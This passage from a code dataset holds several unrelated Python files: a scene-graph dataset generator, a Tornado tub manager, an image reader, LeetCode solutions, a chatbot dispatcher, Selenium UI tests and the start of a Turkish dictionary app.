(4 not in nodes):\n\n for node in nodes:\n label_ = g.nodes[node]['label']\n if len(label_) != 9:\n print(\"Error 89\")\n for l in label_:\n if l < 0 or l > 1:\n print(\"Error 3\")\n for node2 in nodes:\n if g.has_edge(node, node2):\n label_ = g.edges[node, node2]['label']\n if len(label_) != 4:\n print(\"Error 79\")\n for l in label_:\n if l < 0 or l > 1:\n print(\"Error 4\")\n A = nx.to_numpy_matrix(g)\n for u in nodes:\n for v in nodes:\n if g.has_edge(u, v):\n A[u, v] = np.sum(g.edges[u, v]['label'])\n if not nx.is_connected(g):\n print(\"Error disconnected\")\n\n\ndef test_corpus_gen(train_queries,params):\n colors = {\n \"gray\": [87, 87, 87],\n \"red\": [173, 35, 35],\n \"blue\": [42, 75, 215],\n \"green\": [29, 105, 20],\n \"brown\": [129, 74, 25],\n \"purple\": [129, 38, 192],\n \"cyan\": [41, 208, 208],\n \"yellow\": [255, 238, 51]\n }\n colors_list = [\"gray\", \"red\", \"blue\", \"green\", \"brown\", \"purple\", \"cyan\", \"yellow\"]\n corpus_graphs = []\n for q in train_queries:\n corpus = []\n for _ in range(params['pos_corpus_per_query']):\n c = copy.deepcopy(q)\n for u in range(0, params['max_corpus_nodes'] - params['max_query_nodes']):\n # label will be a feature vector 3 for shape, 1 hot encoded next 3 for colors , next 2 for materials, next 1 for size\n shape_id = np.random.randint(0, 3)\n material_id = np.random.randint(6, 8)\n size = np.random.randint(0, 2)\n size = 0.35 * (1 + size)\n label_ = np.zeros(9)\n label_[shape_id] = 1\n label_[material_id] = 1\n label_[8] = size\n label_[3:6] = np.asarray(colors[colors_list[np.random.randint(0, len(colors_list))]]) / 256\n x = np.random.uniform(-3, 3)\n y = np.random.uniform(-3, 3)\n r = size\n c.add_node(u + params['max_query_nodes'], label=label_, pos=(x, y, r))\n c = compute_all_relationships(c)\n corpus.append(c)\n corpus_graphs.append(corpus)\n return corpus_graphs\n\ndef noisy_data_gen(params):\n train_queries,pos_train_corpus = corpus_gen(params)\n pos_test_corpus = test_corpus_gen(train_queries,params)\n pos_val_corpus = test_corpus_gen(train_queries,params)\n\n\n train_corpus = complete_corpus(params,pos_train_corpus)\n test_corpus = complete_corpus(params,pos_test_corpus)\n val_corpus = 
complete_corpus(params,pos_val_corpus)\n    check(train_queries,train_corpus,params)\n    check(train_queries, test_corpus, params)\n    check(train_queries, val_corpus, params)\n    train_queries, train_corpus = noisy_corpus(train_queries, train_corpus, params)\n    _, test_corpus = noisy_corpus([], test_corpus, params)\n    _, val_corpus = noisy_corpus([], val_corpus, params)\n\n    labels = np.zeros((params['num_queries'],params['total_corpus_per_query']))\n    for i in range(params['num_queries']):\n        for j in range(0,params['pos_corpus_per_query']):\n            labels[i][j] = 1\n        for j in range(params['pos_corpus_per_query'],params['total_corpus_per_query']):\n            labels[i][j] = 0\n\n\n    return params,train_queries,train_corpus,test_corpus,val_corpus,labels,labels,labels\n\n\n\ndef main():\n    ap = ArgumentParser()\n    ap.add_argument(\"--data_path\", type=str, default=\"./data/clevr.pkl\")\n    ap.add_argument(\"--logfile\", type=str, default=\"./logs/dataset.log\")\n    ap.add_argument(\"--num_queries\", type=int, default=50)\n    ap.add_argument(\"--noise\", type=float, default=0.0)\n    ap.add_argument(\"--seed\", type=int, default=0)\n    av = ap.parse_args()\n    seed = av.seed\n    random.seed(seed)\n    np.random.seed(seed)\n    os.environ['PYTHONHASHSEED'] = str(av.seed)\n\n    params = {\n        'max_corpus_nodes': 10,\n        'max_query_nodes': 5,\n        'num_queries': av.num_queries,\n        'pos_corpus_per_query': 20,\n        'total_corpus_per_query': 100,\n        'noise': av.noise\n    }\n    data = noisy_data_gen(params)\n    outfile = open(av.data_path, 'wb')\n    pkl.dump(data, outfile)\n    outfile.close()\n\n\nmain()","sub_path":"vaq_dataset_gen.py","file_name":"vaq_dataset_gen.py","file_ext":"py","file_size_in_byte":13706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"396136318","text":"'''\ntub.py\n\nManage tubs\n'''\n\nimport os\nimport json\nimport tornado\n\n\nclass TubManager:\n\n    def run(self, args):\n        WebServer(args[0]).start()\n\n\nclass WebServer(tornado.web.Application):\n\n    def __init__(self, data_path):\n        this_dir = os.path.dirname(os.path.realpath(__file__))\n        static_file_path = os.path.join(this_dir, 'tub_web', 'static')\n        \n        handlers = [\n            (r\"/\", tornado.web.RedirectHandler, dict(url=\"/tubs\")),\n            (r\"/tubs\", TubsView, dict(data_path=data_path)),\n            (r\"/tubs/?(?P<tub_id>[^/]+)?\", TubView),\n            (r\"/api/tubs/?(?P<tub_id>[^/]+)?\", TubApi, dict(data_path=data_path)),\n            (r\"/static/(.*)\", tornado.web.StaticFileHandler, {\"path\": static_file_path}),\n            (r\"/tub_data/(.*)\", tornado.web.StaticFileHandler, {\"path\": data_path}),\n        ]\n\n        settings = {'debug': True}\n\n        super().__init__(handlers, **settings)\n\n    def start(self, port=8886):\n        self.port = int(port)\n        self.listen(self.port)\n        print('Listening on {}...'.format(port))\n        tornado.ioloop.IOLoop.instance().start()\n\n\nclass TubsView(tornado.web.RequestHandler):\n\n    def initialize(self, data_path):\n        self.data_path = data_path\n\n    def get(self):\n        import fnmatch\n        data = {\"tubs\": fnmatch.filter(os.listdir(self.data_path), '*')}\n        self.render(\"tub_web/tubs.html\", **data)\n\n\nclass TubView(tornado.web.RequestHandler):\n\n    def get(self, tub_id):\n        data = {}\n        self.render(\"tub_web/tub.html\", **data)\n\n\nclass TubApi(tornado.web.RequestHandler):\n\n    def initialize(self, data_path):\n        self.data_path = data_path\n\n    def get(self, tub_id):\n        tub_path = os.path.join(self.data_path, tub_id)\n        tub_json = os.path.join(tub_path, 'tub.json')\n\n        if not os.path.isfile(tub_json):\n            seqs = [ int(f.split(\"_\")[0]) for f in 
os.listdir(tub_path) if f.endswith('.jpg') ]\n            seqs.sort()\n            with open(tub_json, 'w') as outfile:\n                json.dump({'clips': [seqs]}, outfile)\n\n        with open(tub_json,'r') as f:\n            self.set_header(\"Content-Type\", \"application/json; charset=UTF-8\")\n            self.write(f.read())\n\n    def post(self, tub_id):\n        tub_path = os.path.join(self.data_path, tub_id)\n        tub_json = os.path.join(tub_path, 'tub.json')\n\n        with open(tub_json) as infile:\n            old_clips = json.load(infile)\n\n        new_clips = tornado.escape.json_decode(self.request.body)\n\n        with open(tub_json, 'w') as outfile:\n            json.dump(new_clips, outfile)\n\n        import itertools\n        old_frames = list(itertools.chain(*old_clips['clips']))\n        new_frames = list(itertools.chain(*new_clips['clips']))\n        frames_to_delete = [str(item) for item in old_frames if item not in new_frames]\n        for frm in frames_to_delete:\n            os.remove(os.path.join(tub_path, \"record_\" + frm + \".json\"))\n            os.remove(os.path.join(tub_path, frm + \"_cam-image_array_.jpg\"))\n","sub_path":"donkeycar/management/tub.py","file_name":"tub.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"75109754","text":"# -*- coding: utf-8 -*-\r\nimport cv2\r\nimport numpy as np\r\nimport struct\r\n\r\n\r\ndef proc():\r\n\t'''\r\n\tOpen tmp/_tp_imread_pyR.bin: it holds the image path (first 100 bytes, utf8) plus the buffer size buffer_len (last 4 bytes).\r\n\tProduce the response file tmp/_tp_imread_pyT.bin.\r\n\tIf the image fails to open, the first 4 bytes of the response are -1.\r\n\tIf the buffer is too small, the response holds the required buffer size lenBuffer (4 bytes, unit: bytes), dp (4 bytes), heigh (4 bytes), width (4 bytes).\r\n\tOtherwise it returns\r\n\t0, dp, heigh, width, image (dp,height,width)(unsigned char)\r\n\t'''\r\n\r\n\t# read path and buffer_len\r\n\tfile=open('tmp/_tp_imread_pyR.bin','rb')\r\n\tpath=file.read(100).decode('utf-8')\r\n\tlenBuffer=struct.unpack('i',file.read(4))[0]\r\n\tfile.close()\r\n\r\n\t# load the image\r\n\timg=cv2.imread(path)\r\n\t\r\n\t# if reading failed, reply with failure: ret is -1 (the response file has to be opened first)\r\n\tif hasattr(img,'shape')==False:\r\n\t\tfile=open('tmp/_tp_imread_pyT.bin','wb+')\r\n\t\tbf=struct.pack('i',-1)\r\n\t\tfile.write(bf)\r\n\t\tfile.close()\r\n\t\treturn\r\n\t\r\n\t# open the response file\r\n\tfile=open('tmp/_tp_imread_pyT.bin','wb+')\r\n\r\n\t# get height, width, depth\r\n\theigh=img.shape[0]\r\n\twidth=img.shape[1]\r\n\tdp=img.shape[2] # dp==3\r\n\tlenData=heigh*width*dp # lenData<=lenBuffer\r\n\r\n\t# buffer too small: ret = required size, dp, h, w\r\n\tif lenData>lenBuffer:\r\n\t\tbf=struct.pack('iiii',lenData,dp,heigh,width)\r\n\t\tfile.write(bf)\r\n\t\tfile.close()\r\n\t\treturn\r\n\r\n\t# buffer is large enough: write the header and the image\r\n\tif dp==3:\r\n\t\timg=cv2.cvtColor(img,cv2.COLOR_BGR2RGB) # convert to RGB\r\n\tbf=struct.pack('iiii',0,dp,heigh,width)\r\n\tfile.write(bf)\r\n\r\n\tfor c in range(dp):\r\n\t\tfor i in range(heigh):\r\n\t\t\tfor j in range(width):\r\n\t\t\t\tbf=struct.pack('B',img[i,j,c])\r\n\t\t\t\tfile.write(bf)\r\n\t\r\n\tfile.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n    proc()\r\n","sub_path":"examples/cifar10-tinynet/python/imread.py","file_name":"imread.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"253383276","text":"#\n# @lc app=leetcode id=69 lang=python3\n#\n# [69] Sqrt(x)\n#\n# https://leetcode.com/problems/sqrtx/description/\n#\n# algorithms\n# Easy (31.04%)\n# Total Accepted:    353.5K\n# Total Submissions: 1.1M\n# Testcase Example:  '4'\n#\n# Implement int sqrt(int x).\n# \n# Compute and return the square root of x, where x is guaranteed to be a\n# non-negative integer.\n# \n# Since the return type is an integer, the decimal digits are truncated and\n# only the integer part of the result is returned.\n# \n# Example 1:\n# \n# \n# Input: 4\n# Output: 
2\n# \n# \n# Example 2:\n# \n# \n# Input: 8\n# Output: 2\n# Explanation: The square root of 8 is 2.82842..., and since \n# the decimal part is truncated, 2 is returned.\n# \n# \n#\nclass Solution:\n    def mySqrt(self, x: int):\n        if x in [0, 1]:\n            return x\n        cur = x\n        while True:\n            if cur**2==x:\n                return cur\n            elif (cur//2)**2 < x:\n                break\n            cur//=2\n        l, r = cur//2, cur\n        while r > l:\n            mid = (r+l)//2\n            if mid**2==x or mid**2<x<(mid+1)**2:\n                return mid\n            elif mid**2 > x:\n                r = mid\n            else:\n                l = mid \n        return l\n    def mySqrt1(self, x):\n        return int(x**0.5)\nprint(Solution().mySqrt(6))\n","sub_path":"cn/BinarySearch/69.sqrt-x.py","file_name":"69.sqrt-x.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"382340405","text":"import os\nimport Globals\nimport PM.pm as pm\nimport PM.rexecutor as r_executor\nfrom Enums.reply_enum import ReplyType\nfrom Enums.bot_state_enum import BotState\nfrom Enums.execution_enum import ExecutionState\n#from ContextManager.ContextManager import ContextManager as c_manager\nfrom NLP import HelperFunctions as h_functions\n\nfrom decouple import config\n\nR_SCRIPT = config('R_SCRIPT')\nR_SCRIPT_FOLDER = config('R_SCRIPT_FOLDER')\n\n_previous_intent = None\n\ndef find_command_back(msg, e_obj):\n    for i in e_obj.objects:\n        if i.intent == msg:\n            if i.execution == ExecutionState.Nothing:\n                return i.function(), i.reply_type\n            return i.function, i.reply_type\n    return [\"I'm sorry, but I don't understand that command, please type /help to get info on the possible commands.\", ReplyType.text]\n\n\n#import NLP.ExecutionObjects as e_obj\n#Uniform function to handle both commands and intents from dialogflow\n#msg is the input, command is a boolean specifying if input is a command\ndef execute_input(msg, e_objects, chat_id, command):\n    global _previous_intent\n    context_manager = Globals.get_context_manager()\n    function = None\n    reply_type = None\n    for i in e_objects: # !!!!!!!\n        if command:\n            if i.command is not None and i.command[1:] == msg:\n                function = i.function\n                reply_type = i.reply_type\n                _previous_intent = i\n                break\n        else:\n            if i.intent == msg:\n                function = i.function\n                reply_type = i.reply_type\n                _previous_intent = i\n                break\n    if function == None or reply_type == None:\n        return [\"I'm sorry, but I don't understand that command, please type /help to get info on the possible commands.\", ReplyType.text]\n    if i.change_state:\n        if i.new_state == BotState.Waiting_for_conformance_input:\n            Globals.set_bot_state(BotState.Waiting_for_conformance_input)\n            return \"\"\"How would you like the conformance check to be done? 
by running alpha miner on the current log and using this for model, by running inductive miner on the current log and using this for model or just by using the current model?\\n\nPlease write 'alpha', 'inductive' or 'current' to choose an option.\"\"\", ReplyType.text\n    if i.script_from_db:\n        #Import script to run\n        _, _, script, _ = context_manager.get_script(i.script_name)\n        Globals.bot_state_init_mining()\n        result = i.function(script, context_manager.get_current_log(chat_id))\n        Globals.bot_state_finish()\n        return result, i.reply_type\n    if i.execution == ExecutionState.Nothing:\n        #function doesn't take any arguments\n        return function(), reply_type\n    elif i.execution == ExecutionState.Log:\n        #Function takes log as argument\n        Globals.bot_state_init_mining()\n        result = function(context_manager.get_current_file(chat_id, 'xes'))\n        Globals.bot_state_finish()\n        return result, reply_type\n    elif i.execution == ExecutionState.Model:\n        #Function takes model as argument\n        Globals.bot_state_init_mining()\n        result = function(context_manager.get_current_model(chat_id))\n        Globals.bot_state_finish()\n        return result, reply_type\n    elif i.execution == ExecutionState.Both:\n        #Function takes both log and model as arguments\n        Globals.bot_state_init_mining()\n        result = function(context_manager.get_current_log(chat_id), context_manager.get_current_model(chat_id))\n        Globals.bot_state_finish()\n        return result, reply_type\n    elif i.execution == ExecutionState.Chat_id:\n        result = function(chat_id)\n        return result, reply_type\n    else: \n        return function, reply_type\n    \n\ndef handle_conformance(msg, chat_id):\n    c_manager = Globals.get_context_manager()\n    conformance_type = \"\"\n    conformance_model = \"\"\n    if 'precision' in _previous_intent.intent:\n        conformance_type = 'precision'\n    elif 'fitness' in _previous_intent.intent:\n        conformance_type = 'fitness'\n    elif 'complete' in _previous_intent.intent:\n        conformance_type = 'complete'\n    else:\n        return \"Something's wrong\", ReplyType.text\n    if msg.lower() == 'alpha':\n        conformance_model = 'alpha'\n    elif msg.lower() == 'inductive':\n        conformance_model = 'inductive'\n    elif msg.lower() == 'current':\n        conformance_model = 'current'\n    else:\n        return \"Something's wrong with your input\", ReplyType.text\n\n    Globals.bot_state_init_mining()\n    print(_previous_intent.function)\n    result = _previous_intent.function(c_manager.get_current_log(chat_id), c_manager.get_current_model(chat_id), conformance_type, conformance_model)\n    info = result['result']\n    result_string = \"\"\n    if(isinstance(info, dict)):\n        for key, value in info.items(): \n            result_string += key + \": \" + str(value) + \"\\n\"\n    else:\n        result_string = conformance_type + \"_\" + conformance_model + \" = \" + str(info)\n    reply = [[[result_string[:-1], ReplyType.text], [result['Model'], ReplyType.photo]], ReplyType.multi]\n    print(\"result: \", result)\n    Globals.bot_state_finish()\n    return reply\n    \ndef handle_file_replacement(current_file, intent):\n    c_manager = Globals.get_context_manager()\n    file_type = 'log' if current_file['type'] == 'xes' else 'model'\n    existing, last_id = c_manager.save_file(current_file)\n    if intent == 'Yes':\n        c_manager.set_current_file(last_id, current_file)\n        reply = f\"Ok I've uploaded the {file_type} and replaced it as the chat's current {file_type}\"\n    elif intent == 'No':\n        reply = f\"Ok I haven't replaced the current {file_type}. I've just saved the {file_type} you sent me to this chat's files.\"\n    if existing: \n        return [[reply, ReplyType.text], [\"FYI. 
The file you've uploaded seems to already exist on the server, so I've created a reference to that file instead.\", ReplyType.text]], ReplyType.multi\n    return reply, ReplyType.text\n","sub_path":"NLP/execution.py","file_name":"execution.py","file_ext":"py","file_size_in_byte":6047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"393644205","text":"## Problem Description.\n# ref: https://leetcode.com/problems/reorder-list/\n# Difficulty: Medium\n#\n# Given a singly linked list L: L0→L1→…→Ln-1→Ln,\n# reorder it to: L0→Ln→L1→Ln-1→L2→Ln-2→…\n# You must do this in-place without altering the nodes' values.\n# For example,\n# Given {1,2,3,4}, reorder it to {1,4,2,3}.\n\n# Solution\n# ref: http://www.programcreek.com/2013/12/in-place-reorder-a-singly-linked-list-in-java/\n# ref: http://www.acmerblog.com/reorder-list-leetcode-6088.html\n# ref: http://www.cnblogs.com/zuoyuan/p/3700846.html\n\n# Definition for singly-linked list.\nclass ListNode:\n    def __init__(self, x):\n        self.val = x\n        self.next = None\n\nclass Solution:\n    # @param {ListNode} head\n    # @return {void} Do not return anything, modify head in-place instead.\n    def reorderList(self, head):\n\n        if head is None or head.next is None:\n            return\n\n        s=f=fh=head\n        # f moves two times faster than s\n        while f.next is not None and f.next.next is not None:\n            s=s.next\n            f=f.next.next\n\n        # reverse the second half\n        c=s.next\n        p=None\n        # when c is None, p points to the first node of the reversed half\n        while c is not None:\n            n=c.next\n            c.next=p\n            p=c\n            c=n\n\n        # merge the first half and the reversed second half\n        s.next=None\n        lh=p\n        while fh is not None and lh is not None:\n            n=fh.next\n            fh.next=lh\n            lh=lh.next\n            fh.next.next=fh=n\n","sub_path":"tobebest/leetcode/python/linked_lists/reorder_list.py","file_name":"reorder_list.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"150714443","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport pygame\nimport time\n\nimport Properties\nimport json\n\nINIT_OP, OP, INIT_FEED, FEED, INIT_SUBJ, SUBJ, END = [ p for p in range(7) ]\n\nclass ExpRunner():\n\n    def __init__(self, exp_struct, trial, boxes):\n        self.exp_struct = exp_struct\n        self.trial = trial\n        self.boxes = boxes\n        self.set()\n        self.instruction = None\n\n    def set(self):\n        self.current_trial = 0\n        self.num_consecutive_lost = 0\n        self.waiting = True\n\n    def next_trial(self, correct, feedback=False):\n        if not feedback:\n            if correct:\n                self.num_consecutive_lost = 0\n            else:\n                self.num_consecutive_lost += 1\n\n        # print \"NEXT - Num consecutive_lost\", self.num_consecutive_lost\n\n        if self.waiting == True:\n            if self.num_consecutive_lost < self.exp_struct[\"cut_off\"]:\n                self.next()\n            else:\n                self.end_test()\n\n\n    def to_waiting(self):\n        self.waiting = True\n\n    def next(self):\n        self.current_trial = self.current_trial + 1\n\n        if str(self.current_trial) in self.exp_struct[\"trials\"]:\n            t = str(self.current_trial)\n            # print \"STARTING WITH trial \" + t\n\n            sequence = self.exp_struct[\"trials\"][str(self.current_trial)][0]\n            feedback = json.loads(self.exp_struct[\"trials\"][str(self.current_trial)][1])\n            self.instruction.set_num(len(sequence), (lambda: self.trial.start(t, sequence, feedback)))\n        else:\n            
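# no entry for this trial id in exp_struct -> stop the experiment\n            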
self.end_test()\n","sub_path":"corsi/src/inc/ExpRunner.py","file_name":"ExpRunner.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"297214718","text":"from django.contrib.auth.models import User\n\nfrom core.management.commands.create_public_group import create_public_group\nfrom core.management.commands.create_user import init_user\nfrom core.models import Analysis, DataSet\nfrom factory_boy.utils import make_analyses_with_single_dataset, make_datasets\n\nfrom .utils import (MAX_WAIT, SeleniumTestBaseGeneric, assert_body_text,\n assert_text_within_id, delete_from_ui, login,\n wait_until_class_visible, wait_until_id_clickable,\n wait_until_id_visible)\n\n\nclass RefinerySeleniumTestBase(SeleniumTestBaseGeneric):\n \"\"\"\n Base class for selenium tests specifically testing Refinery UI components\n \"\"\"\n def setUp(self, site_login=True, initialize_guest=True,\n public_group_needed=True):\n\n super(RefinerySeleniumTestBase, self).setUp()\n\n if initialize_guest:\n init_user(\"guest\", \"guest\", \"guest@coffee.com\", \"Guest\", \"Guest\",\n \"Test User\", is_active=True)\n self.user = User.objects.get(username=\"guest\")\n\n if site_login:\n login(self.browser, self.live_server_url)\n\n if public_group_needed:\n create_public_group()\n\n\nclass NoLoginTestCase(RefinerySeleniumTestBase):\n \"\"\"\n Ensure that Refinery looks like it should when there is no currently\n logged in user\n \"\"\"\n\n # RefinerySeleniumTestBase.setUp(): We don't need to login or\n # initialize the guest user this time\n def setUp(self, site_login=True, initialize_guest=True,\n public_group_needed=False):\n super(NoLoginTestCase, self).setUp(initialize_guest=False,\n site_login=False)\n\n def test_login_not_required(self):\n self.browser.get(self.live_server_url)\n assert_body_text(\n self.browser,\n search_array=['Collaboration', 'Statistics', 'About',\n 'Register', 'Login', 'Launch Pad', 'Data Sets',\n 'Analyses', 'Workflows']\n )\n\n self.browser.find_element_by_link_text('Statistics').click()\n assert_body_text(\n self.browser,\n search_array=[\n 'Users',\n 'Groups',\n 'Files',\n 'Data Sets',\n 'Workflows',\n 'Projects'\n ]\n )\n\n self.browser.find_element_by_link_text('About').click()\n assert_body_text(self.browser,\n search_array=['Background', 'Contact', 'Funding',\n 'Team',\n 'Most Recent Code for this Instance'])\n # TODO: All sections are empty right now\n\n\nclass DataSetsPanelTestCase(RefinerySeleniumTestBase):\n \"\"\"\n Ensure that the DataSet upload button and DataSet Preview look like\n they're behaving normally\n \"\"\"\n\n def test_data_set_preview(self):\n \"\"\"Test DataSet Preview\"\"\"\n\n # Create sample Data & refresh page\n make_analyses_with_single_dataset(5, self.user)\n\n wait_until_class_visible(self.browser, \"title\", MAX_WAIT)\n self.browser.find_elements_by_class_name(\"title\")[0].click()\n\n search_array = [\"SUMMARY\", \"Description\",\n \"Number of files (total file size)\", \"Owner\",\n \"ANALYSES\", \"REFERENCES\", \"PROTOCOLS\",\n ]\n for item in Analysis.objects.filter(name__startswith=\"Test Analysis\"):\n search_array.append(item.name)\n\n assert_body_text(self.browser, search_array)\n\n def test_upload_button(self):\n \"\"\"Test Upload button\"\"\"\n\n wait_until_id_clickable(self.browser, \"import-button\",\n MAX_WAIT).click()\n assert_body_text(\n self.browser,\n search_array=[\n \"Data Set Import\",\n \"Tabular Metadata\",\n \"ISA-Tab Metadata\",\n \"PROVIDE METADATA 
FILE\",\n \"Download an example tabular metadata file.\",\n \"Must contain column headers in the first row of the table\"]\n )\n\n\nclass UiDeletionTestCase(RefinerySeleniumTestBase):\n \"\"\"Ensure proper deletion of DataSets and Analyses from the UI\"\"\"\n\n def test_dataset_deletion(self, total_datasets=2):\n \"\"\"Delete some datasets and make sure the UI updates properly\"\"\"\n\n # Create sample Data & refresh page\n make_datasets(total_datasets, self.user)\n wait_until_id_visible(self.browser, \"total-datasets\", MAX_WAIT)\n assert_text_within_id(\n self.browser,\n \"total-datasets\",\n MAX_WAIT,\n \"{} data sets\".format(total_datasets)\n )\n\n delete_from_ui(self.browser, \"dataset\", total_datasets)\n\n def test_analysis_deletion(self, total_analyses=2):\n \"\"\"Delete some analyses and make sure the UI updates properly\"\"\"\n\n # Create sample Data\n make_analyses_with_single_dataset(total_analyses, self.user)\n\n wait_until_id_visible(self.browser, \"total-datasets\", MAX_WAIT)\n assert_text_within_id(self.browser, \"total-datasets\", MAX_WAIT,\n \"{} data sets\".format(1))\n assert_text_within_id(self.browser, \"total-analyses\",\n \"{} analyses\".format(total_analyses))\n\n delete_from_ui(self.browser, \"analysis\", total_analyses)\n\n def test_cascading_deletion_of_analyses(self, total_analyses=5):\n \"\"\"Delete a Dataset and make sure its Analyses are removed from\n the UI as well\"\"\"\n\n # Create sample Data\n make_analyses_with_single_dataset(total_analyses, self.user)\n\n wait_until_id_clickable(self.browser, \"total-datasets\", MAX_WAIT)\n assert_text_within_id(\n self.browser,\n \"total-datasets\",\n MAX_WAIT,\n \"{} data sets\".format(1))\n wait_until_id_clickable(self.browser, \"total-analyses\", MAX_WAIT)\n assert_text_within_id(\n self.browser, \"total-analyses\", MAX_WAIT,\n \"{} analyses\".format(\n total_analyses))\n\n self.browser.find_elements_by_class_name('dataset-delete')[0].click()\n\n wait_until_id_clickable(\n self.browser, 'dataset-delete-button', MAX_WAIT).click()\n\n # Make sure that there are no more Analyses left after the One\n # Dataset is deleted\n wait_until_id_clickable(self.browser, \"total-analyses\", MAX_WAIT)\n assert_text_within_id(\n self.browser, \"total-analyses\", MAX_WAIT,\n \"{} analysis\".format(0))\n wait_until_id_clickable(\n self.browser, \"total-datasets\", MAX_WAIT)\n assert_text_within_id(\n self.browser,\n \"total-datasets\",\n MAX_WAIT,\n \"{} data sets\".format(0))\n\n def test_that_dataset_404s_are_handled(self, total_analyses=5):\n \"\"\"Test use case where DataSet objects are deleted (for example by an\n admin, or a user inbetween multiple windows) while a user is about to\n delete said object(s) themselves, User should receive a \"Not Found\"\n message\"\"\"\n\n # Create sample Data\n make_analyses_with_single_dataset(total_analyses, self.user)\n\n wait_until_id_clickable(self.browser, \"total-datasets\", MAX_WAIT)\n assert_text_within_id(\n self.browser,\n \"total-datasets\",\n MAX_WAIT,\n \"{} data sets\".format(1))\n wait_until_id_clickable(self.browser, \"total-analyses\", MAX_WAIT)\n assert_text_within_id(\n self.browser, \"total-analyses\", MAX_WAIT,\n \"{} analyses\".format(\n total_analyses))\n\n # Simulate scenario where objects have been deleted on the backend\n DataSet.objects.all().delete()\n\n self.browser.find_elements_by_class_name('dataset-delete')[0].click()\n\n wait_until_id_clickable(\n self.browser, 'dataset-delete-button', MAX_WAIT).click()\n\n wait_until_id_clickable(\n self.browser, 
\"deletion-message-text\", MAX_WAIT)\n assert_text_within_id(\n self.browser, \"deletion-message-text\", MAX_WAIT, \"not found.\")\n wait_until_id_clickable(\n self.browser, 'dataset-delete-close-button', 5).click()\n\n # Ensure that ui displays proper info\n wait_until_id_clickable(self.browser, \"total-analyses\", MAX_WAIT)\n assert_text_within_id(\n self.browser, \"total-analyses\", MAX_WAIT,\n \"{} analysis\".format(0))\n wait_until_id_clickable(self.browser, \"total-datasets\", MAX_WAIT)\n assert_text_within_id(\n self.browser,\n \"total-datasets\",\n MAX_WAIT,\n \"{} data sets\".format(0))\n\n def test_that_analysis_404s_are_handled(self, total_analyses=5):\n \"\"\"Test use case where Analysis objects are deleted (for example by an\n admin, or a user inbetween multiple windows) while a user is about to\n delete said object(s) themselves, User should receive a \"Not Found\"\n message\"\"\"\n\n # Create sample Data\n make_analyses_with_single_dataset(total_analyses, self.user)\n\n wait_until_id_clickable(self.browser, \"total-datasets\", MAX_WAIT)\n assert_text_within_id(\n self.browser,\n \"total-datasets\",\n MAX_WAIT,\n \"{} data sets\".format(1))\n wait_until_id_clickable(self.browser, \"total-analyses\", MAX_WAIT)\n assert_text_within_id(\n self.browser, \"total-analyses\", MAX_WAIT,\n \"{} analyses\".format(\n total_analyses))\n\n # Simulate scenario where objects have been deleted on the backend\n Analysis.objects.all().delete()\n\n self.browser.find_elements_by_class_name('analysis-delete')[0].click()\n\n wait_until_id_clickable(\n self.browser, 'analysis-delete-button', MAX_WAIT).click()\n\n wait_until_id_clickable(\n self.browser, \"deletion-message-text\", MAX_WAIT)\n assert_text_within_id(\n self.browser, \"deletion-message-text\", MAX_WAIT, \"not found.\")\n wait_until_id_clickable(\n self.browser, 'analysis-delete-close-button', 5).click()\n\n # Ensure that ui displays proper info\n wait_until_id_clickable(self.browser, \"total-analyses\", MAX_WAIT)\n assert_text_within_id(\n self.browser, \"total-analyses\", MAX_WAIT,\n \"{} analysis\".format(0))\n wait_until_id_clickable(self.browser, \"total-datasets\", MAX_WAIT)\n assert_text_within_id(\n self.browser,\n \"total-datasets\",\n MAX_WAIT,\n \"{} data sets\".format(1))\n","sub_path":"refinery/selenium_testing/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":10755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"496059142","text":"from tkinter import *\r\nimport pygame\r\nimport time\r\nimport random\r\n\r\npygame.mixer.init()\r\n\r\npencere=Tk()\r\npencere.tk_setPalette(\"light blue\")\r\npencere.attributes(\"-fullscreen\", 1)\r\n\r\nsözlük={\"abaküs\":\"Sayı boncuğu.\",\r\n \"abartmak\":\"Bir şeyi olduğundan büyük veya çok göstererek anlatmak, mübalâğa etmek.\",\r\n \"abide\":\"Anıt.\",\r\n \"abla\":\"Bir kimsenin kendinden büyük olan kız kardeşi.\",\r\n \"abone\":\"Önceden ödemede bulunarak süreli yayınlara alıcı olma işi.\",\r\n \"abur cubur\":\"Sırası, tadı, yararı gözetilmeksizin rastgele yenilen şeyler.\",\r\n \"acaba\":\"Merak, kararsızlık veya kuşku anlatır.\",\r\n \"acele\":\"Çabuk davranma zorunluluğu, ivedi.\",\r\n \"acemi\":\"Bir işin yabancısı olan, eli işe alışmamış.\",\r\n \"acı\":\"Tat alma organında bazı maddelerin bıraktığı yakıcı durum, tatlı karşıtı.\",\r\n \"acıkmak\":\"Açlık duymak, yemek yeme ihtiyacı duymak.\",\r\n \"acılı\":\"Acı katılmış olan.\",\r\n \"acil\":\"İvedi, ivedili.\",\r\n \"âciz\":\"Gücü bir işe yetmez olan, 
